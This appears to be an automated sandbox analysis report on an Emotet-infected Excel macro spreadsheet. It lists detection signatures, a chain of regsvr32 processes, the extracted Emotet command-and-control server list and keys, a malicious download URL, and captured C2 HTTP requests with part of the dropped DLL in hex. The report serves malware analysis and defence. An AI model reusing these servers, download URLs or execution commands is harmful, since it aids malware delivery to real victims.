Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
commenti_19265309.xlsm

Overview

General Information

Sample Name:commenti_19265309.xlsm
Analysis ID:581726
MD5:ea31d45aabef92c32f90ec8d5ee3fc88
SHA1:16d18be1150fdde8d16c2cae9f92de453ca7342c
SHA256:e287a83571ac14de139663276caeea8ee7c53db3c2c6660f9520d43ac0eb9985
Tags:xlsm
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Command Line Without DLL
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Network Activity
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Document exploit detected (UrlDownloadToFile)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Drops PE files to the user directory
Excel documents contains an embedded macro which executes code when the document is opened
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sigma detected: Excel Network Connections
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Yara detected Xls With Macro 4.0
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2548 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1164 cmdline: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx MD5: 432BE6CF7311062633459EEF6B242FB5)
      • regsvr32.exe (PID: 2860 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns" MD5: 432BE6CF7311062633459EEF6B242FB5)
        • regsvr32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pvpcradve\zcxodsyppc.vhu" MD5: 432BE6CF7311062633459EEF6B242FB5)
          • regsvr32.exe (PID: 1712 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akcjix\aahvlaakfpltdqe.tfa" MD5: 432BE6CF7311062633459EEF6B242FB5)
            • regsvr32.exe (PID: 1156 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Iemtm\pldpzerct.pbt" MD5: 432BE6CF7311062633459EEF6B242FB5)
              • regsvr32.exe (PID: 3060 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Norixqjmezaqkg\rmjvbhreoaju.ozu" MD5: 432BE6CF7311062633459EEF6B242FB5)
                • regsvr32.exe (PID: 2540 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wlsoaenkkrveuupx\vqctv.ugg" MD5: 432BE6CF7311062633459EEF6B242FB5)
                  • regsvr32.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fjfbdmakik\lfmekztlcu.eak" MD5: 432BE6CF7311062633459EEF6B242FB5)
                    • regsvr32.exe (PID: 788 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qjxnmbewg\psrzxbseam.bej" MD5: 432BE6CF7311062633459EEF6B242FB5)
                      • regsvr32.exe (PID: 2652 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Xuxdamzseerbd\xnhieyc.mhi" MD5: 432BE6CF7311062633459EEF6B242FB5)
                        • regsvr32.exe (PID: 1408 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Txlhge\upsbekiq.mnw" MD5: 432BE6CF7311062633459EEF6B242FB5)
                          • regsvr32.exe (PID: 1468 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qitnzewoiifn\ioax.zvc" MD5: 432BE6CF7311062633459EEF6B242FB5)
                            • regsvr32.exe (PID: 2036 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjrcyousgqt\whqvqq.kkc" MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["168.119.39.118:443", "185.168.130.138:443", "168.197.250.14:80", "195.77.239.39:8080", "68.183.93.250:443", "185.184.25.78:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "61.7.231.226:443", "103.41.204.169:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "191.252.103.16:80", "93.104.209.107:8080", "194.9.172.107:8080", "66.42.57.149:443", "59.148.253.194:443", "62.171.178.147:8080", "139.196.72.155:8080", "198.199.98.78:8080", "185.148.168.15:8080", "195.154.146.35:443", "104.131.62.48:8080", "37.44.244.177:8080", "217.182.143.207:443", "54.38.242.185:443", "185.148.168.220:8080", "203.153.216.46:443", "87.106.97.83:7080", "78.46.73.125:443", "54.37.106.167:8080", "37.59.209.141:8080", "54.37.228.122:443", "61.7.231.229:443", "45.71.195.104:8080", "116.124.128.206:8080", "128.199.192.135:8080", "210.57.209.142:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.438925109.0000000000461000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      0000000F.00000002.714099978.0000000000501000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000009.00000002.483801415.0000000000110000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000D.00000002.510846343.0000000000231000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              Click to see the 21 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              5.2.regsvr32.exe.980000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                8.2.regsvr32.exe.150000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  9.2.regsvr32.exe.110000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    15.2.regsvr32.exe.240000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      3.2.regsvr32.exe.460000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        Click to see the 34 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Regsvr32 Command Line Without DLL
                        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns", CommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 1164, ProcessCommandLine: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ufazcuvgqkvqusea\tadr.wns", ProcessId: 2860
                        Sigma detected: Microsoft Office Product Spawning Windows Shell
                        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, CommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2548, ProcessCommandLine: C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx, ProcessId: 1164
                        Sigma detected: Regsvr32 Network Activity
                        Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 168.119.39.118, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 2036, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166
                        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 212.64.200.154, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2548, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                        Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2548, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: http://gymsportive.com/0zwe/pSiUh/Avira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 13.2.regsvr32.exe.230000.1.unpackMalware Configuration Extractor: Emotet {"C2 list": ["168.119.39.118:443", "185.168.130.138:443", "168.197.250.14:80", "195.77.239.39:8080", "68.183.93.250:443", "185.184.25.78:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "61.7.231.226:443", "103.41.204.169:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "191.252.103.16:80", "93.104.209.107:8080", "194.9.172.107:8080", "66.42.57.149:443", "59.148.253.194:443", "62.171.178.147:8080", "139.196.72.155:8080", "198.199.98.78:8080", "185.148.168.15:8080", "195.154.146.35:443", "104.131.62.48:8080", "37.44.244.177:8080", "217.182.143.207:443", "54.38.242.185:443", "185.148.168.220:8080", "203.153.216.46:443", "87.106.97.83:7080", "78.46.73.125:443", "54.37.106.167:8080", "37.59.209.141:8080", "54.37.228.122:443", "61.7.231.229:443", "45.71.195.104:8080", "116.124.128.206:8080", "128.199.192.135:8080", "210.57.209.142:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                        Multi AV Scanner detection for submitted file
                        Source: commenti_19265309.xlsmReversingLabs: Detection: 51%
                        Multi AV Scanner detection for domain / URL
                        Source: gymsportive.comVirustotal: Detection: 6%Perma Link
                        Source: http://gymsportive.com/0zwe/pSiUh/Virustotal: Detection: 13%Perma Link
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: unknownHTTPS traffic detected: 168.119.39.118:443 -> 192.168.2.22:49166 version: TLS 1.2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002992A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002992A

                        Software Vulnerabilities

                        barindex
                        Document exploit detected (drops PE files)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: Lg1r0mo1[1].dll.0.drJump to dropped file
                        Document exploit detected (creates forbidden files)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Lg1r0mo1[1].dllJump to behavior
                        Document exploit detected (process start blacklist hit)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
                        Document exploit detected (UrlDownloadToFile)
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 212.64.200.154:80
                        Source: global trafficDNS query: name: gymsportive.com
                        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 168.119.39.118:443

                        Networking

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 168.119.39.118 187
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorIPs: 168.119.39.118:443
                        Source: Malware configuration extractorIPs: 185.168.130.138:443
                        Source: Malware configuration extractorIPs: 168.197.250.14:80
                        Source: Malware configuration extractorIPs: 195.77.239.39:8080
                        Source: Malware configuration extractorIPs: 68.183.93.250:443
                        Source: Malware configuration extractorIPs: 185.184.25.78:8080
                        Source: Malware configuration extractorIPs: 118.98.72.86:443
                        Source: Malware configuration extractorIPs: 78.47.204.80:443
                        Source: Malware configuration extractorIPs: 159.69.237.188:443
                        Source: Malware configuration extractorIPs: 61.7.231.226:443
                        Source: Malware configuration extractorIPs: 103.41.204.169:8080
                        Source: Malware configuration extractorIPs: 207.148.81.119:8080
                        Source: Malware configuration extractorIPs: 85.214.67.203:8080
                        Source: Malware configuration extractorIPs: 190.90.233.66:443
                        Source: Malware configuration extractorIPs: 191.252.103.16:80
                        Source: Malware configuration extractorIPs: 93.104.209.107:8080
                        Source: Malware configuration extractorIPs: 194.9.172.107:8080
                        Source: Malware configuration extractorIPs: 66.42.57.149:443
                        Source: Malware configuration extractorIPs: 59.148.253.194:443
                        Source: Malware configuration extractorIPs: 62.171.178.147:8080
                        Source: Malware configuration extractorIPs: 139.196.72.155:8080
                        Source: Malware configuration extractorIPs: 198.199.98.78:8080
                        Source: Malware configuration extractorIPs: 185.148.168.15:8080
                        Source: Malware configuration extractorIPs: 195.154.146.35:443
                        Source: Malware configuration extractorIPs: 104.131.62.48:8080
                        Source: Malware configuration extractorIPs: 37.44.244.177:8080
                        Source: Malware configuration extractorIPs: 217.182.143.207:443
                        Source: Malware configuration extractorIPs: 54.38.242.185:443
                        Source: Malware configuration extractorIPs: 185.148.168.220:8080
                        Source: Malware configuration extractorIPs: 203.153.216.46:443
                        Source: Malware configuration extractorIPs: 87.106.97.83:7080
                        Source: Malware configuration extractorIPs: 78.46.73.125:443
                        Source: Malware configuration extractorIPs: 54.37.106.167:8080
                        Source: Malware configuration extractorIPs: 37.59.209.141:8080
                        Source: Malware configuration extractorIPs: 54.37.228.122:443
                        Source: Malware configuration extractorIPs: 61.7.231.229:443
                        Source: Malware configuration extractorIPs: 45.71.195.104:8080
                        Source: Malware configuration extractorIPs: 116.124.128.206:8080
                        Source: Malware configuration extractorIPs: 128.199.192.135:8080
                        Source: Malware configuration extractorIPs: 210.57.209.142:8080
                        Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
                        Source: global trafficHTTP traffic detected: GET /RTqOvyibSpsqRLeCHAwzwsZUvkaT HTTP/1.1Cookie: qNjwxkh=AFLTfK9fIBK6lnbulhI7c8xuJYBHytmEF4RnscbegU5ARco2Ov+wvYmlCWGjR5iRbpiDElFN0mE7/RzA1kBHXra1n+DdZZ/0nWkhpfgcHvYmOKaBSaM2AlKPdCLcHXfASzT21JxpI+itOUwulg0p/YvVS81C8mnpxG+6TaYEIXQNyx0QR8otuNcfuEKU4QpHu9EKg/ECc3gGVpKbTk7/I2FJs30AWb2pLbxGdfiqBgsF51+Oaaj/uTpMmG1137PAZBtRtn3mSRV+k/bNw0I3O4V3sJnZYPMRB6W35SRjpQR4FfjE4A==Host: 168.119.39.118Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/x-msdownloadExpires: Wed, 02 Mar 2022 15:42:19 GMTLast-Modified: Wed, 02 Mar 2022 15:42:19 GMTServer: Set-Cookie: 621f905be66af=1646235739; expires=Wed, 02-Mar-2022 15:43:19 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="Lg1r0mo1.dll"Content-Transfer-Encoding: binaryX-Powered-By-Plesk: PleskWinDate: Wed, 02 Mar 2022 15:43:42 GMTContent-Length: 1028096Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 be 93 00 15 fa f2 6e 46 fa f2 6e 46 fa f2 6e 46 39 fd 31 46 f0 f2 6e 46 39 fd 33 46 ed f2 6e 46 fa f2 6f 46 da f0 6e 46 dd 34 13 46 e5 f2 6e 46 dd 34 03 46 76 f2 6e 46 dd 34 00 46 5b f2 6e 46 dd 34 14 46 fb f2 6e 46 dd 34 12 46 fb f2 6e 46 fa f2 6e 46 fb f2 6e 46 dd 34 16 46 fb f2 6e 46 52 69 63 68 fa f2 6e 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c 7e 1e 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 60 09 00 00 80 06 00 00 00 00 00 27 8e 04 00 00 10 00 00 00 70 09 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 f0 0f 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7b 0b 00 ab 01 00 00 00 00 0c 00 f0 00 00 00 00 50 0c 00 c6 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 0f 00 f4 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 0c 0c 00 f4 0b 00 00 00 40 0c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 50 09 00 00 10 00 00 00 60 09 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 4b 0d 02 00 00 70 09 00 00 10 02 00 00 70 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 7f 00 00 00 80 0b 00 00 40 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b3 3f 00 00 00 00 0c 00 00 40 00 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 40 0c 00 00 10 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c6 fe 02 00 00 50 0c 00 00 00 03 00 00 10 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 05 9f 00 00 00 50 0f 00 00 a0 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                        Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                        Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                        Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                        Source: unknownNetwork traffic detected: IP country count 16
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                        Source: regsvr32.exe, 0000000F.00000002.714066011.000000000032D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://168.119.39.118/
                        Source: regsvr32.exe, 0000000F.00000002.714066011.000000000032D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://168.119.39.118/.N
                        Source: regsvr32.exe, 0000000F.00000002.714070000.0000000000332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaT
                        Source: regsvr32.exe, 0000000F.00000002.714070000.0000000000332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://168.119.39.118/RTqOvyibSpsqRLeCHAwzwsZUvkaTI
                        Source: regsvr32.exe, 0000000F.00000002.714076663.0000000000340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44EDD626.pngJump to behavior
                        Source: unknownDNS traffic detected: queries for: gymsportive.com
                        Source: global trafficHTTP traffic detected: GET /RTqOvyibSpsqRLeCHAwzwsZUvkaT HTTP/1.1Cookie: qNjwxkh=AFLTfK9fIBK6lnbulhI7c8xuJYBHytmEF4RnscbegU5ARco2Ov+wvYmlCWGjR5iRbpiDElFN0mE7/RzA1kBHXra1n+DdZZ/0nWkhpfgcHvYmOKaBSaM2AlKPdCLcHXfASzT21JxpI+itOUwulg0p/YvVS81C8mnpxG+6TaYEIXQNyx0QR8otuNcfuEKU4QpHu9EKg/ECc3gGVpKbTk7/I2FJs30AWb2pLbxGdfiqBgsF51+Oaaj/uTpMmG1137PAZBtRtn3mSRV+k/bNw0I3O4V3sJnZYPMRB6W35SRjpQR4FfjE4A==Host: 168.119.39.118Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
